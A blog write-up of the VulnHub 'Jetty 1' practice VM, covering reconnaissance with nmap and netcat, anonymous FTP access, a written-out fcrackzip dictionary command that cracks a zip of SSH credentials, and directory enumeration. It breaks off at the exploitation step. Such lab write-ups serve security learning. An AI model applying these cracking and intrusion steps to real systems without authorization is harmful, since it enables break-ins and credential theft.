Jetty 1 - VulnHub WriteUp - CYBERGUIDER IT SERVICES INC.

It’s that time again when we challenge our skills in an effort to learn something new daily and VulnHub has provided yet again. Jetty 1 by MrSquid; giving us the opportunity to pay attention to details and use cool tools. Let’s jump in but before we do so, Please read the warning below.

Public Service Announcement

THIS IS ONLY FOR EDUCATIONAL PURPOSES. DO NOT INSTALL/RUN THIS VULNERABLE VM ON ANY PRODUCTION NETWORK!

WHAT WE NEED TO GET STARTED.

Installed version of VMWare Workstation, Player or Oracle VirtualBox.
Download and Import a copy of the Jetty 1 VM.
The imported VM and ensure that network card (NIC) set to HOST-ONLY.
The attacker box NIC also to be set the HOST-ONLY settings.

Reconnaissance

RECON, RECON, RECON….and MORE RECON. We will start with NET Discover and NMAP; to see what is out there.

Identified the following web directories within the NMAP scan results. However, all were unreachable so we scan more.

New Port 65507/tcp open running an unknown service, let’s see if netcat (nc) can do a bit more recon.

OK SSH-2.0, we see you running. Now that we have all the open ports account for (i.e., 21 – FTP, 80-HTTP and 65507-SSH), we need to go back the FTP since it allows “anonymous” login.

README.txt
Hi Henry, here you have your SSH’s password. As you can see the file is encrypted with the default company’s password. Please, once you have read this file, run the following command on your computer to close the FTP server on your side. IT IS VERY IMPORTANT!! CMD: service ftp stop.
Regards, Michael.

The RECON is real on with this one. Now to figure out how to get the DEFAULT COMPANY PASSWORD to unzip this file which will give us SSH creds. So exciting..After researching cracker for zip files, we found the FCRACKZIP tool and it was glorious.

**fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sshpass.zip**

Now that we have the DEFAULT COMPANY PASSWORD, it’s time to try it against the sshpass.zip file.

We have a password but no username, so of course we tried using names gathered during first wave of RECON. Here are the usernames we tried with no success “henry, jetty, michael, mrsquid, squid“. It was at this time we messed up. After, back tracking to VulnHub web Jetty 1 description and carefully reviewed the system information. We found the username, lesson learned make sure your RECON process is tight. We could have easily spend hours try to figure this one out.

Jetty 1 Description
The company Aquarium Life S.L. has contacted you to perform a pentest against one of their machines. They suspect that one of their employees has been committing fraud selling fake tickets. They want you to break into his computer, escalate privileges and search for any evidences that proves this behavior.

Extra information:
The suspicious username is Squiddie.
He was in charge of the ticket selling for the Aquarium. Ethernet settings set to NAT with DHCP enabled. You should find the IP in your VLAN.

To not leave any other stone un-turned, we continued with or RECON process even through we have SSH credentials.

Grab a copy of Jetty 1 web “robots.txt” file with WGET.

robots.txt
User-agent: *
Disallow: /dir/
Disallow: /passwords/
Disallow: /facebook_photos
Disallow: /admin/secret

Browsed to all the web directories/path with no successfully. At this point, we brought out the DIRB tools to dig in further.

Exploitation

Now that we have good information about the system and credentials, It is time to try our SSH access with the credentials discovered in the RECON phase.